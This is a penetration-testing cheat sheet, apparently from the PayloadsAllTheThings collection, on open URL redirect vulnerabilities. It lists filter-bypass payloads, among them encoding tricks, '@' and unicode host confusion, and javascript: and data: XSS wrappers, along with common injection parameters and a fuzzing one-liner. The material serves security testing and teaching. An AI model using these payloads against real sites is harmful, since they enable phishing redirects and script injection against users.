PayloadsAllTheThings/Open Redirect

Open URL Redirection

Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Summary

• Open URL Redirection
  • Summary
  • Exploitation
  • HTTP Redirection Status Code - 3xx
  • Fuzzing
  • Filter Bypass
  • Common injection parameters
  • References

Exploitation

Let’s say there’s a well known website - https://famous-website.tld/. And let's assume that there's a link like :

https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account

After signing up you get redirected to your account, this redirection is specified by the redirectUrl parameter in the URL.
What happens if we change the famous-website.tld/account to evil-website.tld?

https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account

By visiting this url, if we get redirected to evil-website.tld after the sign-up, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.

HTTP Redirection Status Code - 3xx

• 300 Multiple Choices
• 301 Moved Permanently
• 302 Found
• 303 See Other
• 304 Not Modified
• 305 Use Proxy
• 307 Temporary Redirect
• 308 Permanent Redirect

Fuzzing

Replace www.whitelisteddomain.tld from Open-Redirect-payloads.txt with a specific white listed domain in your test case

To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.

WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt

Filter Bypass

Using a whitelisted domain or keyword

www.whitelisted.com.evil.com redirect to evil.com

Using CRLF to bypass "javascript" blacklisted keyword

java%0d%0ascript%0d%0a:alert(0)

Using "//" & "////" to bypass "http" blacklisted keyword

//google.com
////google.com

Using "https:" to bypass "//" blacklisted keyword

https:google.com

Using "//" to bypass "//" blacklisted keyword (Browsers see // as //)

\/\/google.com/
/\/google.com/

Using "%E3%80%82" to bypass "." blacklisted character

/?redir=google。com
//google%E3%80%82com

Using null byte "%00" to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using "@" character, browser will redirect to anything after the "@"

http://www.theirsite.com@yoursite.com/

Creating folder as their domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Using "?" characted, browser will translate it to "/?"

http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com

Host/Split Unicode Normalization

https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
http://a.com／X.b.com

XSS from Open URL - If it's in a JS variable

";alert(0);//

XSS from data:// wrapper

http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==

XSS from javascript:// wrapper

http://www.example.com/redirect.php?url=javascript:prompt(1)

Common injection parameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

Labs

• DOM-based open redirection

References

• filedescriptor
• You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding
• OWASP - Unvalidated Redirects and Forwards Cheat Sheet
• Cujanovic - Open-Redirect-Payloads
• Pentester Land - Open Redirect Cheat Sheet
• Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7
• Host/Split Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019